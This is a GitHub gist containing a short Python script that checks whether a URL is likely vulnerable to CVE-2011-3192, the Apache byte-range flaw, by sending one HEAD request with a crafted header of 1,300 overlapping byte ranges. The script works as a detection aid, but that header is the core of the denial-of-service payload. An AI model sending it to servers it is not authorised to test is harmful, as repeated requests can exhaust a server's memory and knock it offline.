Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
#!/usr/bin/env python
"""
Test the probabilty of a URL being vulnerable to CVE-2011-3192
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
Both this test and real PoC are largely dependent on the content being
served. Dynamic content rendered by mod_php and mod_wsgi is unlikely to be
affected, whereas static or proxied content from the same VirtualHost or
Apache instance may still be vulnerable. For this reason it is worth testing
a variety of different URLs on each server.
@dancarley
"""
import sys
import httplib2
from pprint import pprint
from urlparse import urlparse
if len(sys.argv) != 2:
sys.exit("Usage: %s URL" % sys.argv[0])
url = sys.argv[1]
urlparse(url)
headers = {
"Range": "bytes=0-%s" % "".join(
[",5-%s" % x for x in range(1,1301)]
),
"Accept-Encoding": "gzip",
"Connection": "close",
}
h = httplib2.Http()
resp, cont = h.request(url, "HEAD", headers=headers)
result = "address %r is probably" % url
pprint(resp)
if resp["status"] == "206" and int(resp["content-length"]) > 90000:
print "\n%s vulnerable" % result
else:
print "\n%s NOT vulnerable" % result
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.